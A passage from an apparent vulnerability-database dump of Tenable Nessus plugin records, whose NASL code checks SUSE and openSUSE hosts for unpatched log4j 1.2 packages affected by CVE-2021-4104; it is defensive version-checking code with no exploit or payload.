script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar release = get_kb_item('Host/SuSE/release');\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, 'openSUSE');\nvar os_ver = pregmatch(pattern: \"^SUSE([\\d.]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'openSUSE');\nos_ver = os_ver[1];\nif (release !~ \"^(SUSE15\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, 'openSUSE', '15.3', release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'openSUSE ' + os_ver, cpu);\n\nvar pkgs = [\n {'reference':'log4j12-1.2.17-4.3.1', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'log4j12-javadoc-1.2.17-4.3.1', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'log4j12-manual-1.2.17-4.3.1', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE}\n];\n\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var reference = NULL;\n var release = NULL;\n var cpu = NULL;\n var rpm_spec_vers_cmp = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['cpu'])) cpu = 
package_array['cpu'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (reference && release) {\n if (rpm_check(release:release, cpu:cpu, reference:reference, rpm_spec_vers_cmp:rpm_spec_vers_cmp)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'log4j12 / log4j12-javadoc / log4j12-manual');\n}\n", "cvss": {"score": 6, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2022-04-11T03:45:20", "description": "The remote SUSE Linux SLES15 host has packages installed that are affected by a vulnerability as referenced in the SUSE- SU-2021:4111-1 advisory.\n\n - JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data when the attacker has write access to the Log4j configuration. The attacker can provide TopicBindingName and TopicConnectionFactoryBindingName configurations causing JMSAppender to perform JNDI requests that result in remote code execution in a similar fashion to CVE-2021-44228. Note this issue only affects Log4j 1.2 when specifically configured to use JMSAppender, which is not the default. Apache Log4j 1.2 reached end of life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the previous versions. 
(CVE-2021-4104)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-12-18T00:00:00", "type": "nessus", "title": "SUSE SLES15 Security Update : log4j (SUSE-SU-2021:4111-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228"], "modified": "2022-01-20T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:log4j", "p-cpe:/a:novell:suse_linux:log4j-manual", "cpe:/o:novell:suse_linux:15"], "id": "SUSE_SU-2021-4111-1.NASL", "href": "https://www.tenable.com/plugins/nessus/156169", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from\n# SUSE update advisory SUSE-SU-2021:4111-1. The text itself\n# is copyright (C) SUSE.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(156169);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/20\");\n\n script_cve_id(\"CVE-2021-4104\");\n script_xref(name:\"SuSE\", value:\"SUSE-SU-2021:4111-1\");\n script_xref(name:\"IAVA\", value:\"2021-A-0573\");\n script_xref(name:\"IAVA\", value:\"0001-A-0650\");\n\n script_name(english:\"SUSE SLES15 Security Update : log4j (SUSE-SU-2021:4111-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote SUSE Linux SLES15 host has packages installed that are affected by a vulnerability as referenced in the SUSE-\nSU-2021:4111-1 advisory.\n\n - JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data when the attacker has write\n access to the Log4j configuration. 
The attacker can provide TopicBindingName and\n TopicConnectionFactoryBindingName configurations causing JMSAppender to perform JNDI requests that result\n in remote code execution in a similar fashion to CVE-2021-44228. Note this issue only affects Log4j 1.2\n when specifically configured to use JMSAppender, which is not the default. Apache Log4j 1.2 reached end of\n life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the\n previous versions. (CVE-2021-4104)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1193662\");\n # https://lists.suse.com/pipermail/sle-security-updates/2021-December/009917.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b31ab146\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2021-4104\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected log4j and / or log4j-manual packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-4104\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/12/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/12/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/12/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:log4j\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:log4j-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:15\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar release = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nvar os_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'SUSE');\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES15)$\", string:os_ver)) audit(AUDIT_OS_NOT, 'SUSE SLES15', 'SUSE ' + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'SUSE ' + os_ver, cpu);\n\nvar sp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES15\" && (! 
preg(pattern:\"^(0|1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES15 SP0/1\", os_ver + \" SP\" + sp);\n\nvar pkgs = [\n {'reference':'log4j-1.2.17-5.6.1', 'sp':'0', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'SLES_SAP-release-15'},\n {'reference':'log4j-manual-1.2.17-5.6.1', 'sp':'0', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'SLES_SAP-release-15'},\n {'reference':'log4j-1.2.17-5.6.1', 'sp':'1', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'SLES_SAP-release-15.1'},\n {'reference':'log4j-manual-1.2.17-5.6.1', 'sp':'1', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'SLES_SAP-release-15.1'},\n {'reference':'log4j-1.2.17-5.6.1', 'sp':'1', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'SLE_HPC-ESPOS-release-1'},\n {'reference':'log4j-manual-1.2.17-5.6.1', 'sp':'1', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'SLE_HPC-ESPOS-release-1'},\n {'reference':'log4j-1.2.17-5.6.1', 'sp':'0', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'SLE_HPC-ESPOS-release-15'},\n {'reference':'log4j-1.2.17-5.6.1', 'sp':'0', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'SLE_HPC-ESPOS-release-15'},\n {'reference':'log4j-manual-1.2.17-5.6.1', 'sp':'0', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'SLE_HPC-ESPOS-release-15'},\n {'reference':'log4j-manual-1.2.17-5.6.1', 'sp':'0', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'SLE_HPC-ESPOS-release-15'},\n {'reference':'log4j-1.2.17-5.6.1', 'sp':'0', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'SLE_HPC-LTSS-release-15'},\n {'reference':'log4j-1.2.17-5.6.1', 'sp':'0', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'SLE_HPC-LTSS-release-15'},\n {'reference':'log4j-manual-1.2.17-5.6.1', 'sp':'0', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'SLE_HPC-LTSS-release-15'},\n {'reference':'log4j-manual-1.2.17-5.6.1', 'sp':'0', 'release':'SLES15', 
'rpm_spec_vers_cmp':TRUE, 'exists_check':'SLE_HPC-LTSS-release-15'},\n {'reference':'log4j-1.2.17-5.6.1', 'sp':'1', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'SLE_HPC-LTSS-release-15.1'},\n {'reference':'log4j-manual-1.2.17-5.6.1', 'sp':'1', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'SLE_HPC-LTSS-release-15.1'},\n {'reference':'log4j-1.2.17-5.6.1', 'sp':'0', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sles-ltss-release-15'},\n {'reference':'log4j-manual-1.2.17-5.6.1', 'sp':'0', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sles-ltss-release-15'},\n {'reference':'log4j-1.2.17-5.6.1', 'sp':'1', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sles-ltss-release-15.1'},\n {'reference':'log4j-manual-1.2.17-5.6.1', 'sp':'1', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sles-ltss-release-15.1'},\n {'reference':'log4j-1.2.17-5.6.1', 'sp':'1', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sles-release-15.1'},\n {'reference':'log4j-manual-1.2.17-5.6.1', 'sp':'1', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sles-release-15.1'}\n];\n\nvar ltss_caveat_required = FALSE;\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var reference = NULL;\n var release = NULL;\n var sp = NULL;\n var cpu = NULL;\n var exists_check = NULL;\n var rpm_spec_vers_cmp = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (reference && release) {\n if (exists_check) {\n if 
(!rpm_exists(release:release, rpm:exists_check)) continue;\n if ('ltss' >< tolower(exists_check)) ltss_caveat_required = TRUE;\n }\n if (rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, rpm_spec_vers_cmp:rpm_spec_vers_cmp)) flag++;\n }\n}\n\nif (flag)\n{\n var ltss_plugin_caveat = NULL;\n if(ltss_caveat_required) ltss_plugin_caveat = '\\n' +\n 'NOTE: This vulnerability check contains fixes that apply to\\n' +\n 'packages only available in SUSE Enterprise Linux Server LTSS\\n' +\n 'repositories. Access to these package security updates require\\n' +\n 'a paid SUSE LTSS subscription.\\n';\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + ltss_plugin_caveat\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'log4j / log4j-manual');\n}\n", "cvss": {"score": 6, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2022-04-11T05:33:59", "description": "The remote SUSE Linux SUSE15 host has a package installed that is affected by a vulnerability as referenced in the openSUSE-SU-2021:4111-1 advisory.\n\n - JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data when the attacker has write access to the Log4j configuration. The attacker can provide TopicBindingName and TopicConnectionFactoryBindingName configurations causing JMSAppender to perform JNDI requests that result in remote code execution in a similar fashion to CVE-2021-44228. Note this issue only affects Log4j 1.2 when specifically configured to use JMSAppender, which is not the default. Apache Log4j 1.2 reached end of life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the previous versions. 
(CVE-2021-4104)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-12-18T00:00:00", "type": "nessus", "title": "openSUSE 15 Security Update : log4j (openSUSE-SU-2021:4111-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228"], "modified": "2022-01-20T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:log4j-manual", "cpe:/o:novell:opensuse:15.3"], "id": "OPENSUSE-2021-4111.NASL", "href": "https://www.tenable.com/plugins/nessus/156177", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from\n# openSUSE Security Update openSUSE-SU-2021:4111-1. The text itself\n# is copyright (C) SUSE.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(156177);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/20\");\n\n script_cve_id(\"CVE-2021-4104\");\n script_xref(name:\"IAVA\", value:\"2021-A-0573\");\n script_xref(name:\"IAVA\", value:\"0001-A-0650\");\n\n script_name(english:\"openSUSE 15 Security Update : log4j (openSUSE-SU-2021:4111-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote SUSE Linux SUSE15 host has a package installed that is affected by a vulnerability as referenced in the\nopenSUSE-SU-2021:4111-1 advisory.\n\n - JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data when the attacker has write\n access to the Log4j configuration. 
The attacker can provide TopicBindingName and\n TopicConnectionFactoryBindingName configurations causing JMSAppender to perform JNDI requests that result\n in remote code execution in a similar fashion to CVE-2021-44228. Note this issue only affects Log4j 1.2\n when specifically configured to use JMSAppender, which is not the default. Apache Log4j 1.2 reached end of\n life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the\n previous versions. (CVE-2021-4104)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1193662\");\n # https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/RTBP7J2BY2P4Y4VVPTAERSBRBHRHKIDZ/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?72cced44\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2021-4104\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected log4j-manual package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-4104\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/12/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/12/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/12/18\");\n\n 
script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:log4j-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.3\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar release = get_kb_item('Host/SuSE/release');\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, 'openSUSE');\nvar os_ver = pregmatch(pattern: \"^SUSE([\\d.]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'openSUSE');\nos_ver = os_ver[1];\nif (release !~ \"^(SUSE15\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, 'openSUSE', '15.3', release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'openSUSE ' + os_ver, cpu);\n\nvar pkgs = [\n {'reference':'log4j-manual-1.2.17-5.6.1', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE}\n];\n\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var reference = NULL;\n var release = NULL;\n var cpu = NULL;\n var rpm_spec_vers_cmp = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if 
(!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (reference && release) {\n if (rpm_check(release:release, cpu:cpu, reference:reference, rpm_spec_vers_cmp:rpm_spec_vers_cmp)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'log4j-manual');\n}\n", "cvss": {"score": 6, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2022-04-11T05:32:07", "description": "The remote SUSE Linux SUSE15 host has packages installed that are affected by a vulnerability as referenced in the openSUSE-SU-2021:1612-1 advisory.\n\n - JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data when the attacker has write access to the Log4j configuration. The attacker can provide TopicBindingName and TopicConnectionFactoryBindingName configurations causing JMSAppender to perform JNDI requests that result in remote code execution in a similar fashion to CVE-2021-44228. Note this issue only affects Log4j 1.2 when specifically configured to use JMSAppender, which is not the default. Apache Log4j 1.2 reached end of life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the previous versions. 
(CVE-2021-4104)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-12-25T00:00:00", "type": "nessus", "title": "openSUSE 15 Security Update : log4j12 (openSUSE-SU-2021:1612-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228"], "modified": "2022-01-20T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:log4j12", "p-cpe:/a:novell:opensuse:log4j12-javadoc", "p-cpe:/a:novell:opensuse:log4j12-manual", "p-cpe:/a:novell:opensuse:log4j12-mini", "cpe:/o:novell:opensuse:15.2"], "id": "OPENSUSE-2021-1612.NASL", "href": "https://www.tenable.com/plugins/nessus/156276", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from\n# openSUSE Security Update openSUSE-SU-2021:1612-1. The text itself\n# is copyright (C) SUSE.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(156276);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/20\");\n\n script_cve_id(\"CVE-2021-4104\");\n script_xref(name:\"IAVA\", value:\"2021-A-0573\");\n script_xref(name:\"IAVA\", value:\"0001-A-0650\");\n\n script_name(english:\"openSUSE 15 Security Update : log4j12 (openSUSE-SU-2021:1612-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote SUSE Linux SUSE15 host has packages installed that are affected by a vulnerability as referenced in the\nopenSUSE-SU-2021:1612-1 advisory.\n\n - JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data when the attacker has write\n access to the Log4j configuration. 
The attacker can provide TopicBindingName and\n TopicConnectionFactoryBindingName configurations causing JMSAppender to perform JNDI requests that result\n in remote code execution in a similar fashion to CVE-2021-44228. Note this issue only affects Log4j 1.2\n when specifically configured to use JMSAppender, which is not the default. Apache Log4j 1.2 reached end of\n life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the\n previous versions. (CVE-2021-4104)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1193662\");\n # https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/VHZ7COSTMBF33SO76DMFLY7V62XQUQLS/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?5441da09\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2021-4104\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected log4j12, log4j12-javadoc, log4j12-manual and / or log4j12-mini packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-4104\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/12/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/12/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", 
value:\"2021/12/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:log4j12\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:log4j12-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:log4j12-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:log4j12-mini\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.2\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar release = get_kb_item('Host/SuSE/release');\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, 'openSUSE');\nvar os_ver = pregmatch(pattern: \"^SUSE([\\d.]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'openSUSE');\nos_ver = os_ver[1];\nif (release !~ \"^(SUSE15\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, 'openSUSE', '15.2', release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'openSUSE ' + os_ver, cpu);\n\nvar pkgs = [\n {'reference':'log4j12-1.2.17-lp152.3.3.2', 
